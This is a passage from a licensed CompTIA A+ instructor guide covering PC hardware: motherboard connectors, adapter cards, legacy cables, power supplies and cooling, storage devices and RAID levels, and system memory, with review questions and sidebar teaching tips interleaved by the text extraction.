as a command to shut down rather than switching the PC off. Holding down the
power button for a few seconds will cut the power, however.
• Drive (HDD) activity lights—Show when an internal hard disk is being accessed.
• Audio ports—Allow speakers and/or headphones and a microphone to be
connected to the computer.
• USB ports—Internal USB 2 connections are made via 9-pin headers, which
accept up to two 4-pin port connections (the 9th pin is to orient the cable
correctly). USB 3 headers use a 2x10 format and can be cabled to two ports.
When disassembling the system, you should make a diagram of the position and
orientation of header connectors. If you do not have a diagram, you will have to
refer to the motherboard documentation or go by any labels printed on the wires
and headers. These are not always very easy to follow, however.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
28 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Power Connectors
The motherboard also contains various connection points for the power supply
and fans.
• The main P1 motherboard power connector is a distinctive 2-pin x 12-pin block
with square pin receptacles.
• Fan connectors are 3- or 4-pin Molex KK format. There will be one for the CPU
and one or more for the case fans and components such as memory and video
adapters. 4-pin fan connectors support precise fan-speed control via a pulse width
modulation (PWM) signal carried by the blue wire. 3-pin fans are controlled by
varying the voltage.
Fans with a 3-pin connector can usually be used with 4-pin headers, but the system may
not be able to vary the fan speed (or may need special configuration to be able to do
so). A fan with a 4-pin connector will usually work with a 3-pin header but will not be
able to use PWM.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 29
Most modern cards use a PCIe x16 interface. Dual cards, using two (or more) slots,
are also available.
A video/graphics card with DisplayPort, HDMI, and DVI-I ports. (Image ©123RF.com)
Capture Cards
Where a graphics card generates an output video signal to drive a monitor, a
capture card is used to record video input and save it as a type of movie or
streaming media file. Many capture cards are designed to record footage from
computer games. Some are designed to work with PC games, while others record
from game console HDMI sources or from a live camera HDMI source, such as a
camcorder or security camera. Another class of capture card can act as a TV tuner
and record video from broadcast TV sources.
A capture card can be fitted as an internal PCIe or as an external unit connected via
USB/Thunderbolt.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
30 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Audio hardware built into a computer may be susceptible to noise from other internal
components when using recording functionality. Consequently, most audio interfaces
designed for professional use are external units connected via USB or Thunderbolt.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 31
A Wi-Fi adapter can be added to connect to a wireless network. Wi-Fi adapters are
developed to different 802.11 standards. There are also cards that can connect to
cellular data networks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
32 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Motherboards
8
(Image ©123RF.com)
Both Micro-ATX and Mini-ITX are square form factors, but Mini-ITX is 6.7 inches
square, while Micro-ATX is 9.6 inches x 9.6 inches.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 33
6. You have another part to label for inventory. What category of adapter
card is shown in the exhibit?
(Image ©123RF.com)
This is a sound card. It can be identified by the distinctive 3.5 mm audio jacks for
connecting microphones and speakers.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
34 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 1C
Explain Legacy Cable Types
7
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 35
DVI-I supports both analog equipment and digital outputs. DVI-A supports only
analog output and DVI-D supports only digital.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
36 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Each device on a wide SCSI bus must be configured with a unique ID, from 0 to 15.
The host adapter is usually set to 7 or 15. A bootable hard disk is usually allocated
ID 0. The first and last devices on a SCSI bus must be terminated. Termination
may either be enabled internally on the device by setting a switch or by physically
connecting a terminator pack to a device or the host adapter.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 37
Additionally, you should note that while parallel SCSI as a physical interface has
almost completely disappeared, the software interface and command set are used
in many other storage technologies, including serial attached SCSI (SAS). SAS is a
dominant interface for enterprise-class storage devices in the PC workstation and
server market.
EIDE cable with device 0 (black), device 1 (grey), and motherboard (blue) connectors. The red strip
indicates pin 1 on the cable. (Image ©123RF.com)
Unfortunately, the terms master and slave were used to distinguish device 0 and device 1.
CompTIA and the computing industry generally are working to eliminate this type of non-
inclusive terminology, but you will often still see it used in historical support documentation.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
38 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Serial Cables
Show The serial port is a legacy connection interface where data is transmitted over one
Slide(s) wire one bit at a time. Start, stop, and parity bits are used to format and verify data
Serial Cables transmission. This interface is also referred to as Recommended Standard #232
(RS-232). While modern interfaces like USB are also serial, an RS-232 interface uses
Teaching much less sophisticated signaling methods. Consequently, an RS-232 serial port
Tip supports data rates up to about 115 Kbps only.
Explain that this is
another obsolete
interface. The only
likely scenario for
encountering it is in
systems that use dial-
up analog modems
or serial ports as a
remote management
interface.
Serial ports are generally associated with connecting external modems, used to
establish dial-up Internet connections, though even this function has largely been
superseded by USB. You may also come across serial ports on network equipment,
where a serial connection can be used to manage the device.
RS-232 specifies a 25-pin hardware interface, but in practice, PC manufacturers
used the cheaper 9-pin D-subminiature (DB-9) female port shown above.
In Windows, the serial port is referred to as a Communications (COM) port.
You might also come across PS/2 serial ports. PS/2 i used to attach mice and keyboards.
PS/2 ports use a 6-pin mini-DIN format. The green color-coded port is used to attach a
mouse, and the purple one is for a keyboard.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 39
Adapter Cables
Given the numerous cable types and connector types, it will often be the case that Show
a basic peripheral cable will not provide a connection between a port available on Slide(s)
the PC and the port used on the peripheral device. An adapter cable can often be Adapter Cables
used to overcome this issue. An adapter cable has connectors for two different
cable types at each end. An active adapter uses circuitry to convert the signal, while Teaching
a passive adapter simply converts between two connector form factors. Tip
The following types of adapter cable are typical: Passive adapters
solve the problem
• Video adapters convert between signaling types, such as HDMI to VGA, HDMI to of incompatible
DisplayPort, or HDMI to DVI. connector form
factors, whereas active
• USB adapters to convert connector types, such as USB-C to USB-A. There are also adapters/converters
solve the problem of
USB hubs that provide additional ports.
incompatible signals.
• USB adapters to various kinds of output, including Lightning and HDMI.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
40 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Legacy Cable Types
8
Teaching 1. You are labelling systems for inventory. What two types of display
Tip cabling can be connected to this laptop?
Take some time at
the end of each topic
to answer questions.
You can use the
review questions
for discussion in
class or set them for The image shows a 15-pin D-shell type video graphics array (VGA) port and a
students to complete beveled high-definition multimedia interface (HDMI) port. The port in between them
individually during or
is an RJ45 network port, and the two ports on the right are USB Type A ports.
after class.
2. Which ports are present on the graphics card shown below?
The port on the left is digital visual interface (DVI). The pattern of pins identifies it
specifically as dual link DVI-I, which supports both digital and analog signaling. The
port on the right is a DisplayPort interface.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 41
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
42 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 1
Summary
Show
Slide(s)
4
Summary
You should be able to identify and install types of interfaces and their physical
connectors on the motherboard and on peripheral devices.
Teaching
Tip Guidelines for Installing and Configuring Motherboards
Try to include some and Connectors
time at the end
of each lesson to Follow these guidelines to support the installation and configuration of
check students' motherboards, peripheral devices, and connectors:
understanding and
answer questions. • Make support documentation available so that technicians can easily identify
the features of system cases and motherboards—especially ATX/ITX form factor,
Interaction CPU socket type, and header configuration—and perform maintenance and
Opportunity upgrades efficiently.
If you don't have the
opportunity to run • Identify requirements for peripheral cables and connector types so that missing
hands-on workbench or faulty cables can be replaced quickly. Consider stocking adapter cables so that
labs, get students to use can be made of devices even if the connector type is not directly supported
download and review by the motherboard.
the service manuals
from different • Identify opportunities to upgrade devices that use legacy interfaces—VGA, DVI,
vendors, focusing
PCI, EIDE/PATA, SCSI, and RS-232 serial—with faster and more reliable modern
on features of the
case and adapter versions—USB/Thunderbolt, HDMI, DisplayPort, PCIe, SATA, and M.2.
installation. Compare
basic office desktops • Identify systems that have additional requirements to the controllers and ports
with workstations, provided on the motherboard and research the best model of video, capture,
such as a selection of sound, or network card to meet the requirement.
the following models.
• Basic office Additional practice questions for the topics covered in this lesson are available on the
desktops (Dell CompTIA Learning Center.
Optiplex 3080
Tower | HP
ProDesk 405 G4
Desktop Mini PC)
• Workstations
(Dell Precision
3650 | HP Z6 G4
Workstation)
Note the advice on
safety and anti-static
precautions plus
special procedures
for case disassembly
(screw types and
locations, baffles
and plastics, header
cables, and so on).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 2
Installing System Devices
1
LESSON INTRODUCTION
The market for the system components of a personal computer is a complex one. Show
Processors, memory modules, disk drives, and power supplies are advertised with a Slide(s)
bewildering range of technology improvements and performance differentiators. As Objectives
a CompTIA A+ technician, you need to interpret these performance characteristics
and understand how processing, storage, and power components contribute to a Teaching
PC specification that is appropriate for a given usage scenario. You must be able Tip
to resolve compatibility issues and be confident about the manual installation and This lesson focuses
removal procedures for these often expensive and delicate devices. on the main internal
components:
power, storage, and
Lesson Objectives processing.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
44 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 2A
Install and Configure Power
Supplies and Cooling
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 45
Wattage Rating
Power is the rate at which things generate or use energy. Power is measured in Show
in watts (W), calculated for electrical components as voltage multiplied by current Slide(s)
(V*I). A PSU must be able to meet the combined power requirements of the PC’s Wattage Rating
components. The PSU’s output capability is measured as its wattage rating. A PSU
designed for use in a standard desktop PC is typically rated at around 200–300 W. Teaching
Enterprise workstation PCs and servers often have units rated over 300 W to meet Tip
the demands of multiple CPUs, additional memory modules, disk drives, and tape Discuss how to
units. Gaming PCs might require 500 W or better power supplies to cope with the work out the power
high specification CPU and graphics card(s). requirements of
a custom PC or
The power requirement of different components varies widely. For example, CPUs component upgrade.
can range from 17 W to over 100 W, depending on the model. If you are building or
upgrading a system, the simplest way to work out the power requirement is to use
an online calculator. Examples of these tools include enermax.outervision.com and
coolermaster.com/power-supply-calculator.
The power output is not the same as the power the PSU draws from grid power. If a PSU
works at around 75% efficiency, a 300 W supply would draw 400 W from the outlet. The
extra energy is lost mainly as heat. As energy becomes more expensive both in terms
of cost and in terms of the climate, power efficiency is an important criterion to use
when selecting a PSU. An ENERGY STAR 80 PLUS compliant PSU must be 80% efficient at
20–100% of load.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
46 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When specifying a PSU for a system with high power requirements, it is also
important to assess the power distribution for its output voltages (3.3 VDC,
5 VDC, and 12 VDC). Distribution refers to how much power is supplied
over each rail. A rail is a wire providing current at a particular voltage. The
following table shows an example of how power distribution for a PSU might
be configured:
Note that the output of +3.3 V and +5 V has a combined limit. For a modern computer,
the output rating of the +12 VDC rail (or rails) is the most important factor, as +12 VDC
is the most heavily used.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 47
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
48 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 49
There are various mechanisms for clamping a CPU heat sink to the motherboard.
There may be a retaining clip or push pins. Push pins can be released and reset for
insertion by making a half turn with a screwdriver.
Fans
A heat sink is a passive cooling device. Passive cooling means that it does not
require extra energy (electricity) to work. To work well, a heat sink requires good
airflow around the PC. It is important to try to keep “cable clutter” to a minimum
and to ensure that spare adapter slots are covered by blanking plates.
Many PCs have components that generate more heat than can be removed by
passive cooling. A fan improves airflow, which helps to dissipate heat. Fans are used
for the power supply and chassis exhaust points. The fan system will be designed
to draw cool air from the low vents in the front of the case over the motherboard
and expel warmed air from the fan positioned at the top of the back of the case.
Most heat sinks are fitted with fans to improve their cooling performance. The fan’s
power connector must be plugged into a motherboard fan power port.
Thermometer sensors are used at each fan location to set an appropriate speed
and to detect whether a fan has failed.
Some chassis designs incorporate a plastic shroud or system of baffles to cover the
CPU and channel the flow of air. The shroud is usually attached to the case using
plastic clips.
Both fans and heat sinks become less effective if dust is allowed to build up. These
components and any air vents should be cleaned periodically, either manually with
a soft brush and/or compressed air or using a vacuum cleaner approved for use
with PCs.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
50 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Water blocks and brackets are attached to each device to remove heat by
convection. These are attached in a similar way to heat sink/fan assemblies and
then connected to the water loop.
• Radiators and fans are positioned at air vents to dispel the excess heat.
There are also simpler closed-loop systems that install to a single component (CPU or
GPU) only.
An open-loop system will usually need draining, cleaning, and refilling periodically.
It is also important to keep the fans and radiators dust-free. The system should also
be drained prior to moving the PC to a different location.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 51
Review Activity:
Power Supplies and Cooling
3
1. What is the significance of a PSU’s wattage rating when you are designing Show
a custom-build PC? Slide(s)
Review
It determines the CPU model and number and type of memory modules, expansion
cards, and storage devices that can be installed. The PSU’s wattage rating must be
Teaching
higher than the sum of the power requirements of all the PC’s components.
Tip
2. Your company has recently closed a foreign branch office, and you are Take some time at
repurposing some PCs that were shipped from the old location. What the end of each topic
to answer questions.
feature of the PSUs must you check before powering the systems on?
You can use the
review questions
You must check that the voltage selector is set to the correct voltage or, if there
for discussion in
is no selector, that the PSU is suitable for the voltage used by the building power class or set them for
circuit. students to complete
individually during or
3. One of the PCs has a faulty CPU, and one has a faulty power supply. You after class.
can use the CPU from one machine in the other. You have opened the
case and taken anti-static precautions. What steps must you perform to
access the CPU?
You will have to remove the fan and heat-sink assembly, disconnect the fan’s power
connector, release the pins or screws that attach the assembly to the motherboard,
and remove the assembly (a gentle twisting motion may be required if the thermal
paste has stuck the heat sink firmly to the CPU).
4. The repurposed PC is put into service, but later that day the PC’s user
contacts you to say that the system has been displaying numerous alerts
about high temperature. What do you think might be the cause?
You would need to open the case to investigate the problem. Perhaps when the
upgrade was performed, one of the fan power connectors was not attached
properly, or there could be a fault in the fan on the PSU.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
52 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 2B
Select and Install Storage Devices
5
Computer tower with main panel removed showing an attached motherboard and areas for
optical disc drives, 3.5-inch drive bays, and a power supply bay. (Image ©123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 53
Removable mass storage devices and removable media allow data to be archived
from the PC and transferred between PCs. External storage devices are also used
for backup and data transfer or to provide a drive type not available as an internal
unit. A device such as an external hard drive would typically be connected to the
computer via a USB or Thunderbolt port.
Apart from cost, several factors impact the choice of mass storage device:
• Reliability—This concerns both the risk of total device failure and the risk of
partial data corruption. Reliability and expected lifespan are rated by various
statistics that are different for each technology type.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
54 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
SSDs normally outperform HDDs, but there are situations where they can perform worse
than HDDs (when serving multi-gigabyte file sizes, for example).
Flash chips are also susceptible to a type of degradation over the course of many
write operations. The drive firmware and operating system use wear leveling
routines that evenly distribute writing on all blocks of an SSD to optimize the life of
the device.
The NOT AND (NAND) flash memory used in SSDs comes in different types. Single level
cell (SLC) is more reliable and more expensive than multi-level cell (MLC) and triple level
cell (TLC) types.
On a typical modern desktop PC, an SSD might be installed as the computer’s only
internal drive or as a boot drive for use with an additional hard drive. In the second
scenario, the SSD would be used to install the OS and software applications, while
the HDD would be used for user data files.
In terms of the communications interface, an SSD might be packaged in a
2.5-inch caddy and installed to a SATA port using the normal SATA data and
power connectors. Alternatively, the mSATA form factor allows an SSD packaged
as an adapter card to be plugged into a combined data and power port on the
motherboard. With both form factors, the main drawback is that the 600 MBps
SATA interface can be a bottleneck to the best performing SSDs, which can achieve
transfer rates of up to 6.7 GB/s.
Consequently, modern SSDs often use the PCI Express (PCIe) bus directly. Where
SATA uses the advanced host controller interface (AHCI) logical interface to
communicate with the bus, PCIe-based SSDs use the non-volatile memory host
controller interface specification (NVMHCI) or NVM Express (NVMe).
An NVMe SSD can either be packaged for installation to a PCIe slot as an expansion
card or to an M.2 slot. The M.2 adapter card form factor is considerably smaller
than a PCIe adapter and oriented horizontally rather than vertically, so the interface
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 55
is often used on laptops as well as PC motherboards. M.2 supplies power over the
bus so there is no need for a separate power cable. M.2 adapters can be different
widths and lengths so you should check that any given adapter will fit on your
motherboard. Labels indicate the adapter sizes supported. For example, an M.2
2280 adapter is 22mm wide and 80mm long.
M.2 is a physical form factor. You can obtain M.2 SSDs that use the SATA/AHCI bus.
These will typically not perform as well as NVMe-based M.2 SSDs. On the motherboard,
an M.2 socket may be able to support both types of drive or only one; check the
documentation. SATA interface SSDs are usually B keyed, 2-lane PCIe SSDs are usually
B/M keyed, and 4-lane SSDs are usually M keyed.
SSDs are vulnerable to electrostatic discharge (ESD). Always take anti-ESD precautions
when handling and storing these devices.
HDD with drive circuitry and casing removed showing 1) Platters; 2) Spindle;
3) Read/Write Heads; 4) Actuator. (Image by mkphotoshu @123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
56 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 57
When building a RAID array, all the disks should normally be identical in terms of Teaching
capacity and ideally in terms of type and performance. If disks are different sizes, the Tip
size of the smallest disk in the array determines the maximum amount of space that
Ensure that students
can be used on the larger drives.
can distinguish
the features and
configuration of each
RAID 0 (Striping without Parity) RAID level. Students
may find this section
Disk striping divides data into blocks and spreads the blocks in a fixed order among difficult, so be
all the disks in the array. This improves performance as multiple disks are available prepared to allocate
to service requests in parallel. RAID 0 requires at least two disks. The logical volume extra time to it.
size is the combined total of the smallest capacity physical disk in the array.
However, RAID 0 provides no redundancy at all. If any physical disk in the array
fails, the whole logical volume will fail, causing the computer to crash and requiring
data to be recovered from backup. Consequently, RAID 0 only has specialist uses—
typically as some type of non-critical cache store.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
58 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
RAID 1 (Mirroring)
RAID 1 is a mirrored drive configuration using two disks. Each write operation
is duplicated on the second disk in the set, introducing a small performance
overhead. A read operation can use either disk, boosting performance somewhat.
This strategy is the simplest way of protecting a single disk against failure. If one
disk fails, the other takes over. There is little impact on performance during this,
so availability remains good, but the failed disk should be replaced as quickly as
possible as there is no longer any redundancy. When the disk is replaced, it must be
populated with data from the other disk. Performance while rebuilding is reduced,
though RAID 1 is better than other levels in that respect and the rebuilding process
is generally shorter than for parity-based RAID.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 59
In terms of cost per gigabyte, disk mirroring is more expensive than other forms of
fault tolerance because disk space utilization is only 50%.
RAID 5 requires a minimum of three drives but can be configured with more.
This allows more flexibility in determining the overall capacity of the array than is
possible with RAID 1. A “hard” maximum number of devices is set by the controller
or OS support, but the number of drives used is more likely to be determined by
practicalities such as cost and risk. Adding more disks increases the chance of
failure. If more than one disk fails, the volume will be unavailable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
60 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The level of fault tolerance and available disk space is inverse. As you add disks to
the set, fault tolerance decreases but usable disk space increases. If you configure
a RAID 5 set using three disks, a third of each disk is set aside for parity. If four are
used, one-quarter is reserved on each disk. Using a three 80 GB disk configuration,
you would have a 160 GB usable volume.
RAID 10—Either disk in each of the sub-volumes can fail without bringing down the main volume.
(Image ©123RF.com)
Show This configuration requires at least four disks, and there must be an even number
Slide(s) of disks. It carries the same 50% disk overhead as mirroring.
Removable Storage
Drives Removable Storage Drives
Teaching Removable storage can refer either to a storage device that can be moved from
Tip computer to computer without having to open the case or to storage media that is
You should not need removable from its drive.
to spend long on this.
Drive enclosures are Drive Enclosures
not on the syllabus,
so you may prefer to HDDs and SSDs can be provisioned as removable storage in an enclosure. The
skip them in class. enclosure provides a data interface (USB, Thunderbolt, or eSATA), a power
Make sure students
understand the
connector (if necessary), and protection for the disk.
difference between
flash drive and
memory card formats.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 61
Some enclosures can be connected directly to a network rather than to a PC. This
is referred to as network attached storage (NAS). Advanced enclosures can host
multiple disk units configured as a RAID array.
USB thumb drive (left) and SD memory card (right). (Image ©123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
62 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The memory card form factor is used in consumer digital imaging products, such
as digital still and video cameras, and to expand smartphone and tablet storage.
A PC can be fitted with a memory card reader device. These are usually designed
to fit in a front-facing drive bay. The reader then needs to be connected to a USB
controller. Most motherboards have at least one spare USB header for making
internal connections. Alternatively, the reader may come with an expansion card.
There are several proprietary types of memory card, each of which also has
different sizes and performance ratings. Most memory card readers work with
multiple card types. As an example, Secure Digital (SD) cards are available in three
capacity variants. The original SD cards have a 2 GB maximum capacity, whereas
SDHC is up to 32 GB and SDXC is up to 2 TB. There are also four speed variants. The
original specification is up to 25 MBps, UHS allows up to 108 MBps, UHS-II is rated
at up to 156 MBps full-duplex or 312 MBps half-duplex, while UHS-III specifies two
full-duplex rates of 312 MBps (FD312) and 624 MBps (FD624). Smaller form factor
microSD, microSDHC, and microSDXC cards are also available.
The smaller form factors can be used with regular size readers using a caddy to hold the
card.
Optical Drives
Show Compact Discs (CDs), Digital Versatile Discs (DVDs), and Blu-ray Discs (BDs) are
Slide(s) mainstream storage formats for music and video retail. All types of optical media
Optical Drives use a laser to read the data encoded on the disc surface. The discs are marketed as
being hard-wearing, but scratches can render them unreadable.
Teaching These discs can also be used as storage media for PC data. Each disc type is
Tip available in recordable and rewritable formats:
Again, you should
not need to spend • Basic recordable media can be written to once only in a single session.
long on this. Make
sure students can • Multisession recordable media can be written to in more than one session, but
distinguish recordable data cannot be erased.
and rewritable
formats. • Rewritable media can be written and erased in multiple sessions, up to a given
number of write cycles.
Each optical disc type has different capacity and transfer rate:
• CD has a maximum capacity of 700 MB and is available in recordable (CD-R) and
rewritable (CD-RW) formats. The base transfer rate of a CD is 150 KBps.
• DVD has a capacity of 4.7 GB for a single layer, single-sided disc up to about 17 GB
for a dual-layer, double-sided disc. At launch, there were competing DVD+R/RW
and DVD-R/RW recordable and rewritable formats, but most drives can use
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 63
either, designated by the ± symbol. The base transfer rate for DVD is 1.32 MBps,
equivalent to 9x CD speed.
• Blu-ray has a capacity of 25 GB per layer. The base speed for Blu-ray is 4.5 MBps,
and the maximum theoretical rate is 16x (72 MBps).
An internal optical drive can be installed to a 5.25-inch drive bay and connected
to the motherboard via SATA data and power connectors. An external unit would
be connected via USB (or possibly eSATA or Thunderbolt). External optical drives
typically require their own power supply, provided via a supplied AC adapter. Some
drives use a tray-based mechanism, while other use a slot-loading mechanism.
Drives also feature a small hole that accesses a disc eject mechanism (insert a paper
clip to activate the mechanism). This is useful if the standard eject button will not work
or if the drive does not have power.
Optical drives are rated according to their data transfer speed. An optical drive that
can perform recording/rewriting is marketed with three speeds, always expressed
as the record/rewrite/read speed (for example, 24x/16x/52x). New drives are
generally multi-format, but you may come across older drives with no Blu-ray
support.
Consumer DVDs and Blu-rays feature digital rights management (DRM) and region-
coding copy-protection mechanisms. Region coding, if enforced, means that a disc
can only be used on a player from the same region. On a PC, the region can usually
be set using device properties. The firmware normally prevents this from being
changed more than a couple of times.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
64 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Storage Devices
6
3. If you have a computer with three hard disks, what type of RAID fault-
tolerant configuration will make best use of them?
RAID 5 (striping with parity). RAID 0 is not fault tolerant. RAID 1 and RAID 10 require
an even number of disks.
4. You are configuring four 120 GB drives in a RAID 5 array. How much space
will be available?
360 GB.
RAID 10 requires at least four disks (two mirrored pairs) and comes with a 50%
capacity overhead, so the volume will only be half the total disk capacity.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 65
Topic 2C
Install and Configure System Memory
7
The fixed disk provides persistent storage when the computer is turned off, but Teaching
a PC also requires fast random access memory (RAM) to load applications and Tip
files. Adding system RAM is one of the simplest and most cost-effective ways to Explain that “memory”
increase a computer’s performance, but there are many types of RAM and ways of refers to non-
configuring the memory subsystem that you must be able to choose between for persistent storage.
given scenarios. This means that
the device must be
powered on to retain
System RAM and Virtual Memory information.
The CPU works by processing the instructions generated by software (processes) Show
in a pipeline. Instructions that are at the top of the pipeline are stored in the Slide(s)
CPU’s registers and cache. The CPU only has a small amount of cache, however. System RAM and
Consequently, the operation of the CPU must be supported by additional storage Virtual Memory
technologies.
Teaching
When a process is executed or a data file opened, the image is loaded from the Tip
fixed disk into system memory. Instructions are fetched from system memory and
Explain how system
into the CPU’s cache and registers as required. This process is handled by a memory memory provides
controller. a “workspace” for
applications and
System memory is implemented as random-access memory (RAM) devices. RAM data while the PC is
is faster than the flash memory used for SSDs and much faster than an HDD, but switched on.
it is volatile. Volatile means that the memory device can only store data when it is
Explain that virtual
powered on. memory allows the
System memory is measure in gigabytes (GB). The amount of system RAM PC to have a larger
workspace than the
determines the PC’s ability to work with multiple applications at the same time and
amount of physical
to process large files efficiently. memory installed by
using the disk drive.
Virtual RAM/Virtual Memory Note that the OS
also uses the virtual
If there is not enough system RAM, the memory space can be extended by using address space to
disk storage. This is referred to as a pagefile or swap space. The total amount mediate access to
of addressable memory (system RAM plus swap space) is referred to as virtual the RAM devices and
prevent conflicts
memory or virtual RAM. With virtual memory, the OS assigns memory locations to
between processes.
processes in 4 kilobyte chunks called pages. The memory controller moves inactive
pages of memory to the swap space to free up physical RAM and retrieves pages
from the swap space to physical RAM when required by process execution. An
excessive amount of such paging activity will slow the computer down because disk
transfer rates are slower than RAM transfer rates.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
66 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Virtual memory is not just used to supplement RAM with swap space. It serves an
important function in protecting the operation and integrity of the PC. Multiple
processes can share the RAM device resource as a virtual memory space that is
mediated by the operating system. This is more secure and reliable than allowing each
process to use physical RAM devices.
Address Space
The bus between the CPU, memory controller, and memory devices consists of a
data pathway and an address pathway:
• The width of the data pathway determines how much information can be
transferred per clock cycle. In a single channel memory controller configuration,
the data bus is usually 64 bits wide.
• The width of the address bus determines how many memory locations the CPU
can keep track of and consequently limits to the maximum possible amount of
